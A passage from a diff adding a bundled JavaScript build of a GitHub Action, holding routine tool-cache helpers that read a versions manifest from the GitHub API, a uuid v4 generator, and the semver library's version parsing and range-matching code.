defaults to arch of computer + */ +function findAllVersions(toolName, arch) { + const versions = []; + arch = arch || os.arch(); + const toolPath = path.join(_getCacheDirectory(), toolName); + if (fs.existsSync(toolPath)) { + const children = fs.readdirSync(toolPath); + for (const child of children) { + if (isExplicitVersion(child)) { + const fullPath = path.join(toolPath, child, arch || ''); + if (fs.existsSync(fullPath) && fs.existsSync(`${fullPath}.complete`)) { + versions.push(child); + } + } + } + } + return versions; +} +exports.findAllVersions = findAllVersions; +function getManifestFromRepo(owner, repo, auth, branch = 'master') { + return __awaiter(this, void 0, void 0, function* () { + let releases = []; + const treeUrl = `https://api.github.com/repos/${owner}/${repo}/git/trees/${branch}`; + const http = new httpm.HttpClient('tool-cache'); + const headers = {}; + if (auth) { + core.debug('set auth'); + headers.authorization = auth; + } + const response = yield http.getJson(treeUrl, headers); + if (!response.result) { + return releases; + } + let manifestUrl = ''; + for (const item of response.result.tree) { + if (item.path === 'versions-manifest.json') { + manifestUrl = item.url; + break; + } + } + headers['accept'] = 'application/vnd.github.VERSION.raw'; + let versionsRaw = yield (yield http.get(manifestUrl, headers)).readBody(); + if (versionsRaw) { + // shouldn't be needed but protects against invalid json saved with BOM + versionsRaw = versionsRaw.replace(/^\uFEFF/, ''); + try { + releases = JSON.parse(versionsRaw); + } + catch (_a) { + core.debug('Invalid json'); + } + } + return releases; + }); +} +exports.getManifestFromRepo = getManifestFromRepo; +function findFromManifest(versionSpec, stable, manifest, archFilter = os.arch()) { + return __awaiter(this, void 0, void 0, function* () { + // wrap the internal impl + const match = yield mm._findMatch(versionSpec, stable, manifest, archFilter); + return match; + }); +} +exports.findFromManifest = 
findFromManifest; +function _createExtractFolder(dest) { + return __awaiter(this, void 0, void 0, function* () { + if (!dest) { + // create a temp dir + dest = path.join(_getTempDirectory(), v4_1.default()); + } + yield io.mkdirP(dest); + return dest; + }); +} +function _createToolPath(tool, version, arch) { + return __awaiter(this, void 0, void 0, function* () { + const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); + core.debug(`destination ${folderPath}`); + const markerPath = `${folderPath}.complete`; + yield io.rmRF(folderPath); + yield io.rmRF(markerPath); + yield io.mkdirP(folderPath); + return folderPath; + }); +} +function _completeToolPath(tool, version, arch) { + const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); + const markerPath = `${folderPath}.complete`; + fs.writeFileSync(markerPath, ''); + core.debug('finished caching tool'); +} +/** + * Check if version string is explicit + * + * @param versionSpec version string to check + */ +function isExplicitVersion(versionSpec) { + const c = semver.clean(versionSpec) || ''; + core.debug(`isExplicit: ${c}`); + const valid = semver.valid(c) != null; + core.debug(`explicit? 
${valid}`); + return valid; +} +exports.isExplicitVersion = isExplicitVersion; +/** + * Get the highest satisfiying semantic version in `versions` which satisfies `versionSpec` + * + * @param versions array of versions to evaluate + * @param versionSpec semantic version spec to satisfy + */ +function evaluateVersions(versions, versionSpec) { + let version = ''; + core.debug(`evaluating ${versions.length} versions`); + versions = versions.sort((a, b) => { + if (semver.gt(a, b)) { + return 1; + } + return -1; + }); + for (let i = versions.length - 1; i >= 0; i--) { + const potential = versions[i]; + const satisfied = semver.satisfies(potential, versionSpec); + if (satisfied) { + version = potential; + break; + } + } + if (version) { + core.debug(`matched: ${version}`); + } + else { + core.debug('match not found'); + } + return version; +} +exports.evaluateVersions = evaluateVersions; +/** + * Gets RUNNER_TOOL_CACHE + */ +function _getCacheDirectory() { + const cacheDirectory = process.env['RUNNER_TOOL_CACHE'] || ''; + assert_1.ok(cacheDirectory, 'Expected RUNNER_TOOL_CACHE to be defined'); + return cacheDirectory; +} +/** + * Gets RUNNER_TEMP + */ +function _getTempDirectory() { + const tempDirectory = process.env['RUNNER_TEMP'] || ''; + assert_1.ok(tempDirectory, 'Expected RUNNER_TEMP to be defined'); + return tempDirectory; +} +/** + * Gets a global variable + */ +function _getGlobal(key, defaultValue) { + /* eslint-disable @typescript-eslint/no-explicit-any */ + const value = global[key]; + /* eslint-enable @typescript-eslint/no-explicit-any */ + return value !== undefined ? value : defaultValue; +} +/** + * Returns an array of unique values. + * @param values Values to make unique. 
+ */ +function _unique(values) { + return Array.from(new Set(values)); +} +//# sourceMappingURL=tool-cache.js.map + +/***/ }), + +/***/ 7701: +/***/ ((module) => { + +/** + * Convert array of 16 byte values to UUID string format of the form: + * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX + */ +var byteToHex = []; +for (var i = 0; i < 256; ++i) { + byteToHex[i] = (i + 0x100).toString(16).substr(1); +} + +function bytesToUuid(buf, offset) { + var i = offset || 0; + var bth = byteToHex; + // join used to fix memory issue caused by concatenation: https://bugs.chromium.org/p/v8/issues/detail?id=3175#c4 + return ([ + bth[buf[i++]], bth[buf[i++]], + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], '-', + bth[buf[i++]], bth[buf[i++]], + bth[buf[i++]], bth[buf[i++]], + bth[buf[i++]], bth[buf[i++]] + ]).join(''); +} + +module.exports = bytesToUuid; + + +/***/ }), + +/***/ 7269: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +// Unique ID creation requires a high quality random # generator. In node.js +// this is pretty straight-forward - we use the crypto API. + +var crypto = __nccwpck_require__(6113); + +module.exports = function nodeRNG() { + return crypto.randomBytes(16); +}; + + +/***/ }), + +/***/ 7468: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +var rng = __nccwpck_require__(7269); +var bytesToUuid = __nccwpck_require__(7701); + +function v4(options, buf, offset) { + var i = buf && offset || 0; + + if (typeof(options) == 'string') { + buf = options === 'binary' ? 
new Array(16) : null; + options = null; + } + options = options || {}; + + var rnds = options.random || (options.rng || rng)(); + + // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` + rnds[6] = (rnds[6] & 0x0f) | 0x40; + rnds[8] = (rnds[8] & 0x3f) | 0x80; + + // Copy bytes to buffer, if provided + if (buf) { + for (var ii = 0; ii < 16; ++ii) { + buf[i + ii] = rnds[ii]; + } + } + + return buf || bytesToUuid(rnds); +} + +module.exports = v4; + + +/***/ }), + +/***/ 5911: +/***/ ((module, exports) => { + +exports = module.exports = SemVer + +var debug +/* istanbul ignore next */ +if (typeof process === 'object' && + process.env && + process.env.NODE_DEBUG && + /\bsemver\b/i.test(process.env.NODE_DEBUG)) { + debug = function () { + var args = Array.prototype.slice.call(arguments, 0) + args.unshift('SEMVER') + console.log.apply(console, args) + } +} else { + debug = function () {} +} + +// Note: this is the semver.org version of the spec that it implements +// Not necessarily the package version of this code. +exports.SEMVER_SPEC_VERSION = '2.0.0' + +var MAX_LENGTH = 256 +var MAX_SAFE_INTEGER = Number.MAX_SAFE_INTEGER || + /* istanbul ignore next */ 9007199254740991 + +// Max safe segment length for coercion. +var MAX_SAFE_COMPONENT_LENGTH = 16 + +var MAX_SAFE_BUILD_LENGTH = MAX_LENGTH - 6 + +// The actual regexps go on exports.re +var re = exports.re = [] +var safeRe = exports.safeRe = [] +var src = exports.src = [] +var t = exports.tokens = {} +var R = 0 + +function tok (n) { + t[n] = R++ +} + +var LETTERDASHNUMBER = '[a-zA-Z0-9-]' + +// Replace some greedy regex tokens to prevent regex dos issues. These regex are +// used internally via the safeRe object since all inputs in this library get +// normalized first to trim and collapse all extra whitespace. The original +// regexes are exported for userland consumption and lower level usage. 
A +// future breaking change could export the safer regex only with a note that +// all input should have extra whitespace removed. +var safeRegexReplacements = [ + ['\\s', 1], + ['\\d', MAX_LENGTH], + [LETTERDASHNUMBER, MAX_SAFE_BUILD_LENGTH], +] + +function makeSafeRe (value) { + for (var i = 0; i < safeRegexReplacements.length; i++) { + var token = safeRegexReplacements[i][0] + var max = safeRegexReplacements[i][1] + value = value + .split(token + '*').join(token + '{0,' + max + '}') + .split(token + '+').join(token + '{1,' + max + '}') + } + return value +} + +// The following Regular Expressions can be used for tokenizing, +// validating, and parsing SemVer version strings. + +// ## Numeric Identifier +// A single `0`, or a non-zero digit followed by zero or more digits. + +tok('NUMERICIDENTIFIER') +src[t.NUMERICIDENTIFIER] = '0|[1-9]\\d*' +tok('NUMERICIDENTIFIERLOOSE') +src[t.NUMERICIDENTIFIERLOOSE] = '\\d+' + +// ## Non-numeric Identifier +// Zero or more digits, followed by a letter or hyphen, and then zero or +// more letters, digits, or hyphens. + +tok('NONNUMERICIDENTIFIER') +src[t.NONNUMERICIDENTIFIER] = '\\d*[a-zA-Z-]' + LETTERDASHNUMBER + '*' + +// ## Main Version +// Three dot-separated numeric identifiers. + +tok('MAINVERSION') +src[t.MAINVERSION] = '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIER] + ')' + +tok('MAINVERSIONLOOSE') +src[t.MAINVERSIONLOOSE] = '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + + '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')' + +// ## Pre-release Version Identifier +// A numeric identifier, or a non-numeric identifier. 
+ +tok('PRERELEASEIDENTIFIER') +src[t.PRERELEASEIDENTIFIER] = '(?:' + src[t.NUMERICIDENTIFIER] + + '|' + src[t.NONNUMERICIDENTIFIER] + ')' + +tok('PRERELEASEIDENTIFIERLOOSE') +src[t.PRERELEASEIDENTIFIERLOOSE] = '(?:' + src[t.NUMERICIDENTIFIERLOOSE] + + '|' + src[t.NONNUMERICIDENTIFIER] + ')' + +// ## Pre-release Version +// Hyphen, followed by one or more dot-separated pre-release version +// identifiers. + +tok('PRERELEASE') +src[t.PRERELEASE] = '(?:-(' + src[t.PRERELEASEIDENTIFIER] + + '(?:\\.' + src[t.PRERELEASEIDENTIFIER] + ')*))' + +tok('PRERELEASELOOSE') +src[t.PRERELEASELOOSE] = '(?:-?(' + src[t.PRERELEASEIDENTIFIERLOOSE] + + '(?:\\.' + src[t.PRERELEASEIDENTIFIERLOOSE] + ')*))' + +// ## Build Metadata Identifier +// Any combination of digits, letters, or hyphens. + +tok('BUILDIDENTIFIER') +src[t.BUILDIDENTIFIER] = LETTERDASHNUMBER + '+' + +// ## Build Metadata +// Plus sign, followed by one or more period-separated build metadata +// identifiers. + +tok('BUILD') +src[t.BUILD] = '(?:\\+(' + src[t.BUILDIDENTIFIER] + + '(?:\\.' + src[t.BUILDIDENTIFIER] + ')*))' + +// ## Full Version String +// A main version, followed optionally by a pre-release version and +// build metadata. + +// Note that the only major, minor, patch, and pre-release sections of +// the version string are capturing groups. The build metadata is not a +// capturing group, because it should not ever be used in version +// comparison. + +tok('FULL') +tok('FULLPLAIN') +src[t.FULLPLAIN] = 'v?' + src[t.MAINVERSION] + + src[t.PRERELEASE] + '?' + + src[t.BUILD] + '?' + +src[t.FULL] = '^' + src[t.FULLPLAIN] + '$' + +// like full, but allows v1.2.3 and =1.2.3, which people do sometimes. +// also, 1.0.0alpha1 (prerelease without the hyphen) which is pretty +// common in the npm registry. +tok('LOOSEPLAIN') +src[t.LOOSEPLAIN] = '[v=\\s]*' + src[t.MAINVERSIONLOOSE] + + src[t.PRERELEASELOOSE] + '?' + + src[t.BUILD] + '?' 
+ +tok('LOOSE') +src[t.LOOSE] = '^' + src[t.LOOSEPLAIN] + '$' + +tok('GTLT') +src[t.GTLT] = '((?:<|>)?=?)' + +// Something like "2.*" or "1.2.x". +// Note that "x.x" is a valid xRange identifer, meaning "any version" +// Only the first item is strictly required. +tok('XRANGEIDENTIFIERLOOSE') +src[t.XRANGEIDENTIFIERLOOSE] = src[t.NUMERICIDENTIFIERLOOSE] + '|x|X|\\*' +tok('XRANGEIDENTIFIER') +src[t.XRANGEIDENTIFIER] = src[t.NUMERICIDENTIFIER] + '|x|X|\\*' + +tok('XRANGEPLAIN') +src[t.XRANGEPLAIN] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIER] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + + '(?:' + src[t.PRERELEASE] + ')?' + + src[t.BUILD] + '?' + + ')?)?' + +tok('XRANGEPLAINLOOSE') +src[t.XRANGEPLAINLOOSE] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + + '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + + '(?:' + src[t.PRERELEASELOOSE] + ')?' + + src[t.BUILD] + '?' + + ')?)?' + +tok('XRANGE') +src[t.XRANGE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAIN] + '$' +tok('XRANGELOOSE') +src[t.XRANGELOOSE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAINLOOSE] + '$' + +// Coercion. +// Extract anything that could conceivably be a part of a valid semver +tok('COERCE') +src[t.COERCE] = '(^|[^\\d])' + + '(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '})' + + '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + + '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + + '(?:$|[^\\d])' +tok('COERCERTL') +re[t.COERCERTL] = new RegExp(src[t.COERCE], 'g') +safeRe[t.COERCERTL] = new RegExp(makeSafeRe(src[t.COERCE]), 'g') + +// Tilde ranges. 
+// Meaning is "reasonably at or greater than" +tok('LONETILDE') +src[t.LONETILDE] = '(?:~>?)' + +tok('TILDETRIM') +src[t.TILDETRIM] = '(\\s*)' + src[t.LONETILDE] + '\\s+' +re[t.TILDETRIM] = new RegExp(src[t.TILDETRIM], 'g') +safeRe[t.TILDETRIM] = new RegExp(makeSafeRe(src[t.TILDETRIM]), 'g') +var tildeTrimReplace = '$1~' + +tok('TILDE') +src[t.TILDE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAIN] + '$' +tok('TILDELOOSE') +src[t.TILDELOOSE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAINLOOSE] + '$' + +// Caret ranges. +// Meaning is "at least and backwards compatible with" +tok('LONECARET') +src[t.LONECARET] = '(?:\\^)' + +tok('CARETTRIM') +src[t.CARETTRIM] = '(\\s*)' + src[t.LONECARET] + '\\s+' +re[t.CARETTRIM] = new RegExp(src[t.CARETTRIM], 'g') +safeRe[t.CARETTRIM] = new RegExp(makeSafeRe(src[t.CARETTRIM]), 'g') +var caretTrimReplace = '$1^' + +tok('CARET') +src[t.CARET] = '^' + src[t.LONECARET] + src[t.XRANGEPLAIN] + '$' +tok('CARETLOOSE') +src[t.CARETLOOSE] = '^' + src[t.LONECARET] + src[t.XRANGEPLAINLOOSE] + '$' + +// A simple gt/lt/eq thing, or just "" to indicate "any version" +tok('COMPARATORLOOSE') +src[t.COMPARATORLOOSE] = '^' + src[t.GTLT] + '\\s*(' + src[t.LOOSEPLAIN] + ')$|^$' +tok('COMPARATOR') +src[t.COMPARATOR] = '^' + src[t.GTLT] + '\\s*(' + src[t.FULLPLAIN] + ')$|^$' + +// An expression to strip any whitespace between the gtlt and the thing +// it modifies, so that `> 1.2.3` ==> `>1.2.3` +tok('COMPARATORTRIM') +src[t.COMPARATORTRIM] = '(\\s*)' + src[t.GTLT] + + '\\s*(' + src[t.LOOSEPLAIN] + '|' + src[t.XRANGEPLAIN] + ')' + +// this one has to use the /g flag +re[t.COMPARATORTRIM] = new RegExp(src[t.COMPARATORTRIM], 'g') +safeRe[t.COMPARATORTRIM] = new RegExp(makeSafeRe(src[t.COMPARATORTRIM]), 'g') +var comparatorTrimReplace = '$1$2$3' + +// Something like `1.2.3 - 1.2.4` +// Note that these all use the loose form, because they'll be +// checked against either the strict or loose comparator form +// later. 
+tok('HYPHENRANGE') +src[t.HYPHENRANGE] = '^\\s*(' + src[t.XRANGEPLAIN] + ')' + + '\\s+-\\s+' + + '(' + src[t.XRANGEPLAIN] + ')' + + '\\s*$' + +tok('HYPHENRANGELOOSE') +src[t.HYPHENRANGELOOSE] = '^\\s*(' + src[t.XRANGEPLAINLOOSE] + ')' + + '\\s+-\\s+' + + '(' + src[t.XRANGEPLAINLOOSE] + ')' + + '\\s*$' + +// Star ranges basically just allow anything at all. +tok('STAR') +src[t.STAR] = '(<|>)?=?\\s*\\*' + +// Compile to actual regexp objects. +// All are flag-free, unless they were created above with a flag. +for (var i = 0; i < R; i++) { + debug(i, src[i]) + if (!re[i]) { + re[i] = new RegExp(src[i]) + + // Replace all greedy whitespace to prevent regex dos issues. These regex are + // used internally via the safeRe object since all inputs in this library get + // normalized first to trim and collapse all extra whitespace. The original + // regexes are exported for userland consumption and lower level usage. A + // future breaking change could export the safer regex only with a note that + // all input should have extra whitespace removed. + safeRe[i] = new RegExp(makeSafeRe(src[i])) + } +} + +exports.parse = parse +function parse (version, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + if (version instanceof SemVer) { + return version + } + + if (typeof version !== 'string') { + return null + } + + if (version.length > MAX_LENGTH) { + return null + } + + var r = options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL] + if (!r.test(version)) { + return null + } + + try { + return new SemVer(version, options) + } catch (er) { + return null + } +} + +exports.valid = valid +function valid (version, options) { + var v = parse(version, options) + return v ? v.version : null +} + +exports.clean = clean +function clean (version, options) { + var s = parse(version.trim().replace(/^[=v]+/, ''), options) + return s ? 
s.version : null +} + +exports.SemVer = SemVer + +function SemVer (version, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + if (version instanceof SemVer) { + if (version.loose === options.loose) { + return version + } else { + version = version.version + } + } else if (typeof version !== 'string') { + throw new TypeError('Invalid Version: ' + version) + } + + if (version.length > MAX_LENGTH) { + throw new TypeError('version is longer than ' + MAX_LENGTH + ' characters') + } + + if (!(this instanceof SemVer)) { + return new SemVer(version, options) + } + + debug('SemVer', version, options) + this.options = options + this.loose = !!options.loose + + var m = version.trim().match(options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL]) + + if (!m) { + throw new TypeError('Invalid Version: ' + version) + } + + this.raw = version + + // these are actually numbers + this.major = +m[1] + this.minor = +m[2] + this.patch = +m[3] + + if (this.major > MAX_SAFE_INTEGER || this.major < 0) { + throw new TypeError('Invalid major version') + } + + if (this.minor > MAX_SAFE_INTEGER || this.minor < 0) { + throw new TypeError('Invalid minor version') + } + + if (this.patch > MAX_SAFE_INTEGER || this.patch < 0) { + throw new TypeError('Invalid patch version') + } + + // numberify any prerelease numeric ids + if (!m[4]) { + this.prerelease = [] + } else { + this.prerelease = m[4].split('.').map(function (id) { + if (/^[0-9]+$/.test(id)) { + var num = +id + if (num >= 0 && num < MAX_SAFE_INTEGER) { + return num + } + } + return id + }) + } + + this.build = m[5] ? m[5].split('.') : [] + this.format() +} + +SemVer.prototype.format = function () { + this.version = this.major + '.' + this.minor + '.' 
+ this.patch + if (this.prerelease.length) { + this.version += '-' + this.prerelease.join('.') + } + return this.version +} + +SemVer.prototype.toString = function () { + return this.version +} + +SemVer.prototype.compare = function (other) { + debug('SemVer.compare', this.version, this.options, other) + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + return this.compareMain(other) || this.comparePre(other) +} + +SemVer.prototype.compareMain = function (other) { + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + return compareIdentifiers(this.major, other.major) || + compareIdentifiers(this.minor, other.minor) || + compareIdentifiers(this.patch, other.patch) +} + +SemVer.prototype.comparePre = function (other) { + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + // NOT having a prerelease is > having one + if (this.prerelease.length && !other.prerelease.length) { + return -1 + } else if (!this.prerelease.length && other.prerelease.length) { + return 1 + } else if (!this.prerelease.length && !other.prerelease.length) { + return 0 + } + + var i = 0 + do { + var a = this.prerelease[i] + var b = other.prerelease[i] + debug('prerelease compare', i, a, b) + if (a === undefined && b === undefined) { + return 0 + } else if (b === undefined) { + return 1 + } else if (a === undefined) { + return -1 + } else if (a === b) { + continue + } else { + return compareIdentifiers(a, b) + } + } while (++i) +} + +SemVer.prototype.compareBuild = function (other) { + if (!(other instanceof SemVer)) { + other = new SemVer(other, this.options) + } + + var i = 0 + do { + var a = this.build[i] + var b = other.build[i] + debug('prerelease compare', i, a, b) + if (a === undefined && b === undefined) { + return 0 + } else if (b === undefined) { + return 1 + } else if (a === undefined) { + return -1 + } else if (a === b) { + continue + } else { + return compareIdentifiers(a, b) + } + } while 
(++i) +} + +// preminor will bump the version up to the next minor release, and immediately +// down to pre-release. premajor and prepatch work the same way. +SemVer.prototype.inc = function (release, identifier) { + switch (release) { + case 'premajor': + this.prerelease.length = 0 + this.patch = 0 + this.minor = 0 + this.major++ + this.inc('pre', identifier) + break + case 'preminor': + this.prerelease.length = 0 + this.patch = 0 + this.minor++ + this.inc('pre', identifier) + break + case 'prepatch': + // If this is already a prerelease, it will bump to the next version + // drop any prereleases that might already exist, since they are not + // relevant at this point. + this.prerelease.length = 0 + this.inc('patch', identifier) + this.inc('pre', identifier) + break + // If the input is a non-prerelease version, this acts the same as + // prepatch. + case 'prerelease': + if (this.prerelease.length === 0) { + this.inc('patch', identifier) + } + this.inc('pre', identifier) + break + + case 'major': + // If this is a pre-major version, bump up to the same major version. + // Otherwise increment major. + // 1.0.0-5 bumps to 1.0.0 + // 1.1.0 bumps to 2.0.0 + if (this.minor !== 0 || + this.patch !== 0 || + this.prerelease.length === 0) { + this.major++ + } + this.minor = 0 + this.patch = 0 + this.prerelease = [] + break + case 'minor': + // If this is a pre-minor version, bump up to the same minor version. + // Otherwise increment minor. + // 1.2.0-5 bumps to 1.2.0 + // 1.2.1 bumps to 1.3.0 + if (this.patch !== 0 || this.prerelease.length === 0) { + this.minor++ + } + this.patch = 0 + this.prerelease = [] + break + case 'patch': + // If this is not a pre-release version, it will increment the patch. + // If it is a pre-release it will bump up to the same patch version. + // 1.2.0-5 patches to 1.2.0 + // 1.2.0 patches to 1.2.1 + if (this.prerelease.length === 0) { + this.patch++ + } + this.prerelease = [] + break + // This probably shouldn't be used publicly. 
+ // 1.0.0 "pre" would become 1.0.0-0 which is the wrong direction. + case 'pre': + if (this.prerelease.length === 0) { + this.prerelease = [0] + } else { + var i = this.prerelease.length + while (--i >= 0) { + if (typeof this.prerelease[i] === 'number') { + this.prerelease[i]++ + i = -2 + } + } + if (i === -1) { + // didn't increment anything + this.prerelease.push(0) + } + } + if (identifier) { + // 1.2.0-beta.1 bumps to 1.2.0-beta.2, + // 1.2.0-beta.fooblz or 1.2.0-beta bumps to 1.2.0-beta.0 + if (this.prerelease[0] === identifier) { + if (isNaN(this.prerelease[1])) { + this.prerelease = [identifier, 0] + } + } else { + this.prerelease = [identifier, 0] + } + } + break + + default: + throw new Error('invalid increment argument: ' + release) + } + this.format() + this.raw = this.version + return this +} + +exports.inc = inc +function inc (version, release, loose, identifier) { + if (typeof (loose) === 'string') { + identifier = loose + loose = undefined + } + + try { + return new SemVer(version, loose).inc(release, identifier).version + } catch (er) { + return null + } +} + +exports.diff = diff +function diff (version1, version2) { + if (eq(version1, version2)) { + return null + } else { + var v1 = parse(version1) + var v2 = parse(version2) + var prefix = '' + if (v1.prerelease.length || v2.prerelease.length) { + prefix = 'pre' + var defaultResult = 'prerelease' + } + for (var key in v1) { + if (key === 'major' || key === 'minor' || key === 'patch') { + if (v1[key] !== v2[key]) { + return prefix + key + } + } + } + return defaultResult // may be undefined + } +} + +exports.compareIdentifiers = compareIdentifiers + +var numeric = /^[0-9]+$/ +function compareIdentifiers (a, b) { + var anum = numeric.test(a) + var bnum = numeric.test(b) + + if (anum && bnum) { + a = +a + b = +b + } + + return a === b ? 0 + : (anum && !bnum) ? -1 + : (bnum && !anum) ? 1 + : a < b ? 
-1 + : 1 +} + +exports.rcompareIdentifiers = rcompareIdentifiers +function rcompareIdentifiers (a, b) { + return compareIdentifiers(b, a) +} + +exports.major = major +function major (a, loose) { + return new SemVer(a, loose).major +} + +exports.minor = minor +function minor (a, loose) { + return new SemVer(a, loose).minor +} + +exports.patch = patch +function patch (a, loose) { + return new SemVer(a, loose).patch +} + +exports.compare = compare +function compare (a, b, loose) { + return new SemVer(a, loose).compare(new SemVer(b, loose)) +} + +exports.compareLoose = compareLoose +function compareLoose (a, b) { + return compare(a, b, true) +} + +exports.compareBuild = compareBuild +function compareBuild (a, b, loose) { + var versionA = new SemVer(a, loose) + var versionB = new SemVer(b, loose) + return versionA.compare(versionB) || versionA.compareBuild(versionB) +} + +exports.rcompare = rcompare +function rcompare (a, b, loose) { + return compare(b, a, loose) +} + +exports.sort = sort +function sort (list, loose) { + return list.sort(function (a, b) { + return exports.compareBuild(a, b, loose) + }) +} + +exports.rsort = rsort +function rsort (list, loose) { + return list.sort(function (a, b) { + return exports.compareBuild(b, a, loose) + }) +} + +exports.gt = gt +function gt (a, b, loose) { + return compare(a, b, loose) > 0 +} + +exports.lt = lt +function lt (a, b, loose) { + return compare(a, b, loose) < 0 +} + +exports.eq = eq +function eq (a, b, loose) { + return compare(a, b, loose) === 0 +} + +exports.neq = neq +function neq (a, b, loose) { + return compare(a, b, loose) !== 0 +} + +exports.gte = gte +function gte (a, b, loose) { + return compare(a, b, loose) >= 0 +} + +exports.lte = lte +function lte (a, b, loose) { + return compare(a, b, loose) <= 0 +} + +exports.cmp = cmp +function cmp (a, op, b, loose) { + switch (op) { + case '===': + if (typeof a === 'object') + a = a.version + if (typeof b === 'object') + b = b.version + return a === b + + case '!==': + 
if (typeof a === 'object') + a = a.version + if (typeof b === 'object') + b = b.version + return a !== b + + case '': + case '=': + case '==': + return eq(a, b, loose) + + case '!=': + return neq(a, b, loose) + + case '>': + return gt(a, b, loose) + + case '>=': + return gte(a, b, loose) + + case '<': + return lt(a, b, loose) + + case '<=': + return lte(a, b, loose) + + default: + throw new TypeError('Invalid operator: ' + op) + } +} + +exports.Comparator = Comparator +function Comparator (comp, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + if (comp instanceof Comparator) { + if (comp.loose === !!options.loose) { + return comp + } else { + comp = comp.value + } + } + + if (!(this instanceof Comparator)) { + return new Comparator(comp, options) + } + + comp = comp.trim().split(/\s+/).join(' ') + debug('comparator', comp, options) + this.options = options + this.loose = !!options.loose + this.parse(comp) + + if (this.semver === ANY) { + this.value = '' + } else { + this.value = this.operator + this.semver.version + } + + debug('comp', this) +} + +var ANY = {} +Comparator.prototype.parse = function (comp) { + var r = this.options.loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] + var m = comp.match(r) + + if (!m) { + throw new TypeError('Invalid comparator: ' + comp) + } + + this.operator = m[1] !== undefined ? m[1] : '' + if (this.operator === '=') { + this.operator = '' + } + + // if it literally is just '>' or '' then allow anything. 
+ if (!m[2]) { + this.semver = ANY + } else { + this.semver = new SemVer(m[2], this.options.loose) + } +} + +Comparator.prototype.toString = function () { + return this.value +} + +Comparator.prototype.test = function (version) { + debug('Comparator.test', version, this.options.loose) + + if (this.semver === ANY || version === ANY) { + return true + } + + if (typeof version === 'string') { + try { + version = new SemVer(version, this.options) + } catch (er) { + return false + } + } + + return cmp(version, this.operator, this.semver, this.options) +} + +Comparator.prototype.intersects = function (comp, options) { + if (!(comp instanceof Comparator)) { + throw new TypeError('a Comparator is required') + } + + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + var rangeTmp + + if (this.operator === '') { + if (this.value === '') { + return true + } + rangeTmp = new Range(comp.value, options) + return satisfies(this.value, rangeTmp, options) + } else if (comp.operator === '') { + if (comp.value === '') { + return true + } + rangeTmp = new Range(this.value, options) + return satisfies(comp.semver, rangeTmp, options) + } + + var sameDirectionIncreasing = + (this.operator === '>=' || this.operator === '>') && + (comp.operator === '>=' || comp.operator === '>') + var sameDirectionDecreasing = + (this.operator === '<=' || this.operator === '<') && + (comp.operator === '<=' || comp.operator === '<') + var sameSemVer = this.semver.version === comp.semver.version + var differentDirectionsInclusive = + (this.operator === '>=' || this.operator === '<=') && + (comp.operator === '>=' || comp.operator === '<=') + var oppositeDirectionsLessThan = + cmp(this.semver, '<', comp.semver, options) && + ((this.operator === '>=' || this.operator === '>') && + (comp.operator === '<=' || comp.operator === '<')) + var oppositeDirectionsGreaterThan = + cmp(this.semver, '>', comp.semver, options) && + ((this.operator === '<=' 
|| this.operator === '<') && + (comp.operator === '>=' || comp.operator === '>')) + + return sameDirectionIncreasing || sameDirectionDecreasing || + (sameSemVer && differentDirectionsInclusive) || + oppositeDirectionsLessThan || oppositeDirectionsGreaterThan +} + +exports.Range = Range +function Range (range, options) { + if (!options || typeof options !== 'object') { + options = { + loose: !!options, + includePrerelease: false + } + } + + if (range instanceof Range) { + if (range.loose === !!options.loose && + range.includePrerelease === !!options.includePrerelease) { + return range + } else { + return new Range(range.raw, options) + } + } + + if (range instanceof Comparator) { + return new Range(range.value, options) + } + + if (!(this instanceof Range)) { + return new Range(range, options) + } + + this.options = options + this.loose = !!options.loose + this.includePrerelease = !!options.includePrerelease + + // First reduce all whitespace as much as possible so we do not have to rely + // on potentially slow regexes like \s*. This is then stored and used for + // future error messages as well. + this.raw = range + .trim() + .split(/\s+/) + .join(' ') + + // First, split based on boolean or || + this.set = this.raw.split('||').map(function (range) { + return this.parseRange(range.trim()) + }, this).filter(function (c) { + // throw out any that are not relevant for whatever reason + return c.length + }) + + if (!this.set.length) { + throw new TypeError('Invalid SemVer Range: ' + this.raw) + } + + this.format() +} + +Range.prototype.format = function () { + this.range = this.set.map(function (comps) 